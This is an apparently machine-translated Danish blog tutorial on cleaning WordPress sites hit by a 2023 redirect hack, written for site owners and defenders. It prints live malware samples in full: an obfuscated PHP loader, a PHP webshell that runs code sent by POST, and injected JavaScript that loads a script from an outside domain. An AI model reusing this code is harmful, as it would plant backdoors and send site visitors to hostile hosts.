Fix Redirect WordPress Hack 2023 (Omdiriger virus)

WordPress det er helt klart den mest brugte platform CMS (Content Management System) til både blogs og starter online butikker (med modulet WooCommerce), hvilket gør den mest målrettet af computerangreb (hacking). En af de mest brugte hacking-operationer har til formål at omdirigere det kompromitterede websted til andre websider. Redirect WordPress Hack 2023 er en relativt ny malware, der har den virkning at omdirigere hele webstedet til spam-websider, eller som igen kan inficere brugernes computere.

Hvis dit websted udviklede sig på WordPress er omdirigeret til et andet websted, så er det højst sandsynligt offeret for det allerede berømte omdirigeringshack.

I denne tutorial finder du de nødvendige oplysninger og nyttige tips, som du kan bruge til at de-viruse et websted, der er inficeret med en omdirigering WordPress Hack (Virus Redirect). Gennem kommentarerne kan du få yderligere information eller bede om hjælp.

Indhold

Påvisning af den virus, der omdirigerer webstederne WordPress

Et pludseligt og uberettiget fald i webstedstrafikken, et fald i antallet af ordrer (i tilfælde af netbutikker) eller i annonceindtægter er de første tegn på, at der er noget galt. Registrerer"Redirect WordPress Hack 2023” (Virus Omdirigering) kan også gøres “visuelt”, når du åbner hjemmesiden og du bliver omdirigeret til en anden webside.

Erfaringsmæssigt er de fleste web-malware kompatible med internetbrowsere: Chrome, Firefox, Edge, Opera. Hvis du er computerbruger Mac, disse vira er ikke rigtig synlige i browseren Safari. Sikkerhedssystem fra Safari bloker lydløst disse ondsindede scripts.

Hvad skal du gøre, hvis du har en hjemmeside inficeret med Redirect WordPress Hack

Jeg håber, det første skridt er ikke at gå i panik eller slette hjemmesiden. Selv inficerede filer eller virusfiler bør ikke slettes i starten. De indeholder værdifuld information, der kan hjælpe dig med at forstå, hvor sikkerhedsbruddet er, og hvad der påvirkede virussen. Modus operandi.

Luk hjemmesiden for offentligheden.

Hvordan lukker man et viruswebsted for besøgende? Det enkleste er at bruge DNS-manageren og slette IP'en for "A" (domænenavnet) eller definere en ikke-eksisterende IP. Således vil hjemmesidebesøgende være beskyttet mod dette redirect WordPress hack hvilket kan føre dem til virus- eller SPAM-websider.

Hvis du bruger CloudFlare som DNS-manager logger du ind på kontoen og sletter DNS-posterne "A” for domænenavnet. Domænet, der er ramt af virussen, vil således forblive uden en IP og ikke længere kunne tilgås fra internettet.

Du kopierer hjemmesidens IP og "router" den, så det kun er dig, der kan få adgang til den. Fra din computer.

Sådan ændres den rigtige IP på et websted på computere Windows?

Metoden bruges ofte til at blokere adgangen til bestemte websteder ved at redigere "hosts"-filen.

1. Du åbner Notepad eller anden teksteditor (med rettigheder administrator) og rediger filen"hosts". Det ligger i:

C:\Windows\System32\drivers\etc\hosts

2. I filen "hosts" skal du tilføje "rute" til din hjemmesides rigtige IP. IP slettet ovenfor fra DNS-manager.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Gem filen og gå ind på webstedet i browseren.

Hvis hjemmesiden ikke åbner, og du ikke har gjort noget forkert i "hosts"-filen, er det højst sandsynligt en DNS-cache.

For at rydde DNS-cachen på et operativsystem Windows, åben Command Prompt, hvor du kører kommandoen:

ipconfig /flushdns

Sådan ændres den rigtige IP på et websted på computere Mac / MacBestil?

For computerbrugere Mac det er noget nemmere at ændre den rigtige IP på et websted.

1. Åbn hjælpeprogrammet Terminal.

2. Kør kommandolinje (kræver systemadgangskode for at køre):

sudo nano /etc/hosts

3. Samme som for computere Windows, tilføj domænets rigtige IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Gem ændringerne. Ctrl+X (y).

Efter du har "routet", er du den eneste person, der kan få adgang til den inficerede hjemmeside med Redirect WordPress Hack.

Fuld hjemmeside backup – Filer og database

Også selvom den er inficeret med "redirect WordPress hack”, er anbefalingen at lave en generel backup af hele hjemmesiden. Filer og database. Eventuelt kunne du også gemme en lokal kopi af begge filer fra public / public_html samt databasen.

Identifikation af inficerede filer og dem, der er ændret af Redirect WordPress Hack 2023

De vigtigste målfiler for WordPress der er index.php (i roden), header.php, index.php şi footer.php af temaet WordPress aktiver. Kontroller manuelt disse filer og identificer ondsindet kode eller et malware-script.

I 2023 blev en virus af "Redirect WordPress Hack” lagt ind index.php en kode af formularen:

(Jeg anbefaler ikke at køre disse koder!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Afkodet, dette ondsindet script det er dybest set konsekvensen af, at hjemmesiden er inficeret WordPress. Det er ikke scriptet bag malwaren, det er scriptet, der gør det muligt at omdirigere den inficerede webside. Hvis vi afkoder scriptet ovenfor, får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

For at identificere alle filerne på serveren, der indeholder denne kode, er det godt at have adgang SSH til serveren for at køre filkontrol og styring af kommandolinjer på Linux.

Relateret: Sådan finder du ud af, om din blog er inficeret eller ej, med hjælp Google Search . (WordPress Virus)

Nedenfor er to kommandoer, der helt sikkert er nyttige til at identificere nyligt ændrede filer og filer, der indeholder en bestemt kode (streng).

Hvordan ser du på Linux PHP-filer ændret inden for de sidste 24 timer eller en anden tidsramme?

Bestil “find” er meget enkel at bruge og tillader tilpasning til at indstille tidsperioden, stien til søgning og typen af filer.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I outputtet vil du modtage information om datoen og klokkeslættet, hvor filen blev ændret, skrive-/læse-/udførelsestilladelserne (chmod) og hvilken gruppe/bruger den tilhører.

Hvis du vil tjekke flere dage siden, skal du ændre værdien "-mtime -1" eller brug "-mmin -360” i minutter (6 timer).

Hvordan søger man efter en kode (streng) i PHP, Java-filer?

Kommandolinjen "find", der giver dig mulighed for hurtigt at finde alle PHP- eller Java-filer, der indeholder en bestemt kode, er som følger:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Kommandoen vil søge og vise filerne .php şi .js indeholdende"uJjBRODYsU".

Ved hjælp af de to kommandoer ovenfor vil du meget nemt finde ud af, hvilke filer der er blevet ændret for nylig, og hvilke der indeholder malware-kode.

Fjerner skadelig kode fra ændrede filer uden at kompromittere den korrekte kode. I mit scenarie blev malwaren placeret før åbning <head>.

Når du udfører den første "find" kommando, er det meget muligt at opdage nye filer på serveren, som ikke er dine WordPress heller ikke sat der af dig. Filer tilhørende virustypen Redirect WordPress Hack.

I det scenarie, jeg undersøgte, filer af formen "wp-log-nOXdgD.php". Disse er "spawn"-filer, der også indeholder malware-kode, der bruges af virussen til omdirigering.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Formålet med filer af typen "wp-log-*” er at sprede redirect hack-virussen til andre websteder, der er hostet på serveren. Det er en malware-kode af typen "webshell” sammensat af en grundlæggende afsnit (hvor nogle krypterede variabler er defineret) og o udførelsessektion hvorigennem angriberen forsøger at indlæse og udføre en ondsindet kode på systemet.

Hvis der er en variabel POST som hedder 'bh' og dens krypterede værdi MD5 er lig med "8f1f964a4b4d8d1ac3f0386693d28d03", så ser scriptet ud til at skrive det krypterede indhold base64 af en anden variabel kaldet 'b3' i en midlertidig fil og forsøger derefter at inkludere denne midlertidige fil.

Hvis der er en variabel POST eller GET som hedder 'tick', vil scriptet svare med værdien MD5 af strengen"885".

For at identificere alle filer på serveren, der indeholder denne kode, skal du vælge en streng, der er fælles, og derefter køre kommandoen "find” (ligner den ovenfor). Slet alle filer, der indeholder denne malware-kode.

Sikkerhedsfejl udnyttet af Redirect WordPress Hack

Mest sandsynligt ankommer denne omdirigeringsvirus via udnyttelse af administrationsbrugeren WordPress eller ved at identificere en sårbart plugin som gør det muligt at tilføje brugere med privilegier på administrator.

For de fleste websteder bygget på platformen WordPress det er muligt redigering af tema- eller plugin-filerfra administrationsgrænsefladen (Dashboard). Således kan en ondsindet person tilføje malware-kode til temafilerne for at generere scripts vist ovenfor.

Et eksempel på sådan malwarekode er dette:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificeret i temaoverskriften WordPress, umiddelbart efter åbning af etiketten <head>.

Det er ret svært at tyde dette JavaScript, men det er tydeligt, at det forespørger på en anden webadresse, hvorfra det højst sandsynligt henter andre scripts for at oprette filerne "wp-log-*", som jeg talte om ovenfor.

Find og slet denne kode fra alle filer PHP påvirket.

Så vidt jeg kunne se, var denne kode manuelt tilføjet af en ny bruger med administrative rettigheder.

Så for at forhindre tilføjelse af malware fra Dashboard, er det bedst at deaktivere muligheden for at redigere WordPress Temaer / plugins fra dashboardet.

Rediger filen wp-config.php og tilføj linjerne:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Efter denne ændring er der ingen bruger WordPress du vil ikke længere være i stand til at redigere filer fra Dashboard.

Tjek brugere med rolle af Administrator

Nedenfor er en SQL-forespørgsel, du kan bruge til at søge efter brugere med rollen som administrator i platformen WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denne forespørgsel returnerer alle brugere i tabellen wp_users hvem tildelt rollen som administrator. Forespørgslen udføres også for tabellen wp_usermeta at søge i meta 'wp_capabilities', som indeholder oplysninger om brugerroller.

En anden metode er at identificere dem fra: Dashboard → Users → All Users → Administrator. Der er dog praksis, hvorved en bruger kan skjules i Dashboard-panelet. Så den bedste måde at se brugere på"Administrator"I WordPress er SQL-kommandoen ovenfor.

I mit tilfælde identificerede jeg i databasen brugeren med navnet "wp-import-user". Ganske suggestivt.

Herfra kan du også se dato og klokkeslæt for brugeren WordPress var lavet. Bruger-id'et er også meget vigtigt, fordi det søger i serverlogfilerne. På denne måde kan du se al denne brugers aktivitet.

Slet brugere med rolle som administrator som du altså ikke ved ændre adgangskoder til alle administrative brugere. Redaktør, forfatter, Administrator.

Skift adgangskoden til SQL-databasebrugeren af den berørte hjemmeside.

Efter at have taget disse trin, kan hjemmesiden genstartes for alle brugere.

Husk dog, at det, jeg præsenterede ovenfor, er et af måske tusindvis af scenarier, hvor et websted er inficeret med Redirect WordPress Hack i 2023.

Hvis din hjemmeside er blevet inficeret, og du har brug for hjælp, eller hvis du har spørgsmål, er kommentarfeltet åbent.